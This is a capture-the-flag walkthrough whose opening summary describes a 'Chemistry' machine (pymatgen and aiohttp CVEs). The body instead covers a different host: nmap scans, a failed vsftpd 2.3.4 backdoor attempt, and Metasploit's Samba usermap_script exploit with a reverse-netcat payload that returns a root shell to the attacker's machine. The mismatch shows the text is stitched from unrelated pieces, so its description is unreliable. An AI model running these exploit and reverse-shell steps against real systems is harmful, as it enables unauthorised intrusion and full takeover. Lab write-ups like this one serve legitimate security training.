Chemistry is an easy-difficulty Linux machine that showcases a Remote Code Execution (RCE) vulnerability in the pymatgen (CVE-2024-23346) Python library by uploading a malicious CIF file to the hosted CIF Analyzer website on the target. After discovering and cracking hashes, we authenticate to the target via SSH as rosa user. For privilege escalation, we exploit a Path Traversal vulnerability that leads to an Arbitrary File Read in a Python library called AioHTTP (CVE-2024-23334) which is used on the web application running internally to read the root flag.
Recon
Nmap
We start with a port scan using nmap
nmap -sT -p- --min-rate 10000 -oA scans/alltcp 10.10.10.3Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-28 07:16 ESTNmap scan report for 10.10.10.3Host is up (0.021s latency).Not shown: 65530 filtered portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh139/tcp open netbios-ssn445/tcp open microsoft-ds3632/tcp open distccd
Nmap done: 1 IP address (1 host up) scanned in 13.39 secondsnmap -sU -p- --min-rate 10000 -oA scans/alludp 10.10.10.3Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-28 07:17 ESTNmap scan report for 10.10.10.3Host is up (0.019s latency).Not shown: 65531 open|filtered portsPORT STATE SERVICE22/udp closed ssh139/udp closed netbios-ssn445/udp closed microsoft-ds3632/udp closed distcc
Nmap done: 1 IP address (1 host up) scanned in 13.51 secondsnmap -p 21,22,139,445,3632 -sV -sC -oA scans/tcpscripts 10.10.10.3Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-28 07:19 ESTNmap scan report for 10.10.10.3Host is up (0.023s latency).
PORT STATE SERVICE VERSION21/tcp open ftp vsftpd 2.3.4|_ftp-anon: Anonymous FTP login allowed (FTP code 230)| ftp-syst:| STAT:| FTP server status:| Connected to 10.10.14.24| Logged in as ftp| TYPE: ASCII| No session bandwidth limit| Session timeout in seconds is 300| Control connection is plain text| Data connections will be plain text| vsFTPd 2.3.4 - secure, fast, stable|_End of status22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)| ssh-hostkey:| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:|_clock-skew: mean: 4h39m11s, deviation: 0s, median: 4h39m11s| smb-os-discovery:| OS: Unix (Samba 3.0.20-Debian)| NetBIOS computer name:| Workgroup: WORKGROUP\x00|_ System time: 2019-02-28T06:59:11-05:00|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 52.02 secondsFTP 21 - vsFTPd 2.3.4
Important (failed)
We attempted this attack in order to get a session with Metasploit but failed.
Next, we look up potential vulnerabilities for version 2.3.4 of the service, where we learn that this particular version of the service is backdoored. This vulnerability was assigned CVE-2011-2523. We also find instructions on how to exploit the backdoor, which can be done via Metasploit . First, we launch the Metasploit console:
msfconsoleNext, we select the vsftpd_234_backdoor module and set the relevant parameters:
[msf](Jobs:0 Agents:0) >> use exploit/unix/ftp/vsftpd_234_backdoor[*] No payload configured, defaulting to cmd/unix/interact[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> set rhosts 10.10.10.3rhosts => 10.10.10.3Finally, we run the module:
**[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> run[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)[*] 10.10.10.3:21 - USER: 331 Please specify the password.[*] Exploit completed, but no session was created.**The exploit was completed but we were not able to obtain a session.
Foothold
Next we go down our recon nmap scan and search for Samba 3.0.20 in metasploit.
Samba
msfconsole[msf](Jobs:0 Agents:0) >> search Samba 3.0.20Matching Modules================# Name Disclosure Date Rank CheckDescription- ---- --------------- ---- ----- -----------0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script"We select the module:
msf6 > use 0[*] No payload configured, defaulting to cmd/unix/reverse_netcatWe list the exploit’s configuration parameters
msf6 exploit(multi/samba/usermap_script) > options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description ---- --------------- -------- ----------- CHOST no The local client address CPORT no The local client port Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s) RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.50.99 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 AutomaticTo use this module, set RHOSTS to the target’s IP address (the victim machine) and LHOST to your local IP address (typically the tun0 interface on your attacking machine).
Tip (How I remember it:)
- RHOSTS = Remote Host (victim machine)
- LHOST = Local Host (attacker machine)
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> set RHOSTS 10.10.10.3rhosts => 10.10.10.3[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> set LHOST 10.10.14.24lhost => 10.10.14.24Finally, we launch the exploit by running run :
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> run[*] Started reverse TCP handler on 10.10.14.24:4444[*] Command shell session 1 opened (10.10.14.24:4444 -> 10.10.10.3:58344)
iduid=0(root) gid=0(root)This gives use access to root user!